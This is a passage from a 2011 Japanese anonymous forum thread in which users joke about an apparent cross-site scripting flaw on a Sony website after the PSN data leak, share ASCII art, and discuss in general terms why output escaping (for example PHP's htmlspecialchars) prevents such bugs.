170名無しさん@涙目です。(catv?):2011/05/07(土) 21:28:48.49 ID:Bj+WDwcx0
ハッカー云々じゃないだろ
素人なんだよこの会社
171名無しさん@涙目です。(東京都):2011/05/07(土) 21:28:57.39 ID:ixV0k2+w0
         __ , -------- 、__
      , - ':::::::::::::::::::::::::::::::::::::::::\
     / ;;;;;;;::::::::::::::::::::::::::::::::;;;;;;;;;;;;;;\
    /,,;,,,,,  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  ,,,,,,,;:::丶
   / :::::::::;;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;:::::::::::::::ヽ
   i゙:::;:::::||::::::ii:::::::::::||::::::::::::::::::;:::::::::::::::::::::::::::゙i
  i゙::::|;;;;| |;;;;| |::::::::::| |:::::::::::::::::||:::::::::::::::::::::::::::::|
 . i゙::::::i     ''''''''''' '───' |;;;;;;;;;;::::::::::::::::::::|
  .|:::::::|,-====-´  ゙ヽ,,,,,,,,,,,,、    |:::::::::::::::::::|
  |;::::::::|,-----、    ~ニニ,,_`    |:::::::::::::::::::|
  `ヽ、i (、i´ノ     ´い,, ノ '    |;;;::::::::::::::/   なんでソニーすぐ終わってしまうん?
  .   i ^~~~ー==--  ー'-+、     / ゙-、;;;;/
     {      ヽゝ          '-'~ノ
    λ   ''゙゙゙'''-''---、       /-'^
     ヽ,    ^~^         (
     /  `丶 、     , -   /^l
     |   /( ノ `''''''´~  __, - '  ゙i、
    {  / /| ̄ ̄ ̄ ̄   _,- '¨ }
    {/ /  ゙ー────'~   \|
    /               ヽ  \
172名無しさん@涙目です。(チベット自治区):2011/05/07(土) 21:41:58.53 ID:ZjV6nZjK0
よくわからんから何がどうなってるのか誰か産業で
173名無しさん@涙目です。(兵庫県):2011/05/07(土) 21:44:22.95 ID:BBWLnjI30
スーパーハカーの仕業!絶対許せないサイバーテロ!とかGKが吠えてたけど、実際は
PSNの情報漏洩もショッボい突破のされ方だったのかもなw
174名無しさん@涙目です。(新潟県):2011/05/07(土) 21:48:43.57 ID:4QoE7nMO0
iframeとかimgとか埋め込めまくれるしな
175名無しさん@涙目です。(福岡県):2011/05/07(土) 21:52:31.32 ID:hAM3IG4B0
XSSってなんなん?
176名無しさん@涙目です。(関西地方):2011/05/07(土) 22:47:36.42 ID:28dwbjAi0
まじか・・。そりゃ個人情報流出するよな
177 【東電 79.8 %】 (群馬県):2011/05/07(土) 22:49:34.62 ID:o7t6rwHn0
>>75
派遣でも、スキルがほとんど無い凄い安い人材使ってるとか
格安で中国あたりにでも作ってもらってるんじゃね?
178名無しさん@涙目です。(チベット自治区):2011/05/07(土) 23:06:58.38 ID:P/drG2qy0
今来たけど特定のjsファイルを実行させられるところまでいった?
179名無しさん@涙目です。(dion軍):2011/05/07(土) 23:07:58.62 ID:rpTYeO4H0
NoScriptが反応したわ
180名無しさん@涙目です。(関西地方):2011/05/07(土) 23:12:12.51 ID:YvpSCrr00
>>1
SONYって書いてあるスカスカのページが何なの?
181名無しさん@涙目です。(長屋):2011/05/07(土) 23:14:42.14 ID:haRF3uDb0
ゆとり多すぎだろ
ちょっとは調べろ
182名無しさん@涙目です。(catv?):2011/05/07(土) 23:17:27.60 ID:zBctZ/Rz0
東電ソニーユッケ
183名無しさん@涙目です。(大阪府):2011/05/08(日) 00:11:17.24 ID:XhAIQgfk0
ブラウザの脆弱性じゃん
184名無しさん@涙目です。(大阪府):2011/05/08(日) 00:57:03.11 ID:Ngx2Lk3L0
>>183
>>183
>>183
185名無しさん@涙目です。(広西チワン族自治区):2011/05/08(日) 02:45:55.16 ID:Zjrz+rD2O
技術も運用もダメダメか
186名無しさん@涙目です。(関西地方):2011/05/08(日) 02:49:00.36 ID:j3L0gouH0
ソニーもずいぶん構ってちゃんだな
もっとクールな会社なイメージがあったよ
ツンデレのつもりがフルボッコにされちゃったんだね。
187名無しさん@涙目です。(関西地方):2011/05/08(日) 02:50:12.27 ID:Yx8gq5Db0
任天堂になってる
188名無しさん@涙目です。(京都府):2011/05/08(日) 02:59:18.53 ID:H/dBRD3s0
>>87
           / ̄ ̄ ̄\  
          /  ⌒  ⌒ ヽ 
         /  ( ●)(●) |  
         |    (__人__) }   うーっす
        /、.    ` ⌒´  ヽ  
       /            |   
       |           | /    
       ヽ_|  ┌──┐ |丿     
         |  ├──┤ |      
         |  ├──┤ |
189 忍法帖【Lv=1,xxxP】 (dion軍):2011/05/08(日) 03:04:07.59 ID:uC1uskyO0
1
190 忍法帖【Lv=5,xxxP】 (チベット自治区):2011/05/08(日) 03:05:20.51 ID:BNszDB6g0
もうだめぽ
191 忍法帖【Lv=2,xxxP】 (dion軍):2011/05/08(日) 03:19:05.73 ID:uC1uskyO0
2
192名無しさん@涙目です。(東京都):2011/05/08(日) 04:40:11.76 ID:YetdPVla0
getパラメータ変えるとロゴ変わるってことか
内部でどんな処理してるか知らないけどこれって悪用できるの?
193名無しさん@涙目です。(東京都):2011/05/08(日) 04:43:05.10 ID:IfWS3oTe0
>>192
ぼっさんの画像表示せいっていう命令を検索フォームに入力するとそのまま、
ぼっさんの画像表示せいという検索結果はありませんでしたって返すだけよ
悪用すると、ぼっさんの画像と見せかけて無限にウィンドウを開く.jsを実行するURLを生成したりできるだけ
sonyのドメインで
194名無しさん@涙目です。(福岡県):2011/05/08(日) 04:45:33.02 ID:07nlNycP0
これってcookie盗むぐらいしか使い道ないの?
195名無しさん@涙目です。(catv?):2011/05/08(日) 04:55:12.13 ID:GMaEUOxu0
ユーザ入力やデータベースやプログラムから作った文字列データを
HTMLのページにさしこんで出力するときに
もしもその文字列データにHTMLタグやJavaScriptコードが含まれていたとしても
それがページ内でHTMLタグやJavaScriptとして解釈されず
単なる文字列データとしてページ内で安全に表示されるように
文字列データに対して適切な「エスケープ処理」を行う

これって本来はセキュリティ要件でもなんでもなくて
それこそ大昔の汎用機とかの時代から、データの受け渡し処理では必須の処理だよね
なんでこんな当たり前のことが,今この時代に満足に実現できないの?
Webアプリってそんなに複雑で難しいシステムなの?
196名無しさん@涙目です。(チベット自治区):2011/05/08(日) 05:14:59.51 ID:Q/Wnaco40
>>195
そりゃあ複雑で難しいシステムだろ
197名無しさん@涙目です。(和歌山県):2011/05/08(日) 09:52:15.90 ID:1UUy9wa80
凄いなソニーは。色々な問題で疲れた日本人の心を笑いで癒そうとしている。
198名無しさん@涙目です。(福井県):2011/05/08(日) 09:54:26.62 ID:MZNM047G0

ソニーって、同人でやってる零細会社だっけ?
199名無しさん@涙目です。(福井県):2011/05/08(日) 09:56:36.44 ID:MZNM047G0
昔からウォークマンやってて、メモリースティックを利用した
ネットワークウォークマンとかいうのを発売して

アプリとしてSonicStageとかいうのも出してたけど、クソアプリ認定されてて
改善される前に、あっという間にiPod+iTunesにシェア掻っ攫われていった時点で
ソニーのレベルなんて知れてる
200名無しさん@涙目です。(大阪府):2011/05/08(日) 10:47:18.92 ID:hEt3xten0
>>195
やるのは簡単だけど、やらないといけないって知らない人がいる。
201名無しさん@涙目です。(愛知県):2011/05/08(日) 11:47:59.18 ID:WZrpeSl20
>>195
ホント、情けないよな。
プロでも何でもない俺でもエスケープ処理位できるのに…。

PHPだとhtmlspecialchars()関数で一発なのに。
202名無しさん@涙目です。(東海・関東):2011/05/08(日) 11:53:45.57 ID:qVxy+RAnO
>>49
無視されるどころか 訴えるぞ とまで言われた んでハッカーが切れていろいろ公開した
203名無しさん@涙目です。(長崎県):2011/05/08(日) 12:08:40.47 ID:MEt7w2/q0
こんな初歩的なミスをw
って思って自分のサイトでタグ入れて検索したら見事にばぐったw
まあ誰にでもあるミスだから仕方ないなこれは
気づいたときに直せばいいんだよ
204名無しさん@涙目です。(東京都)
今時かよって話だよ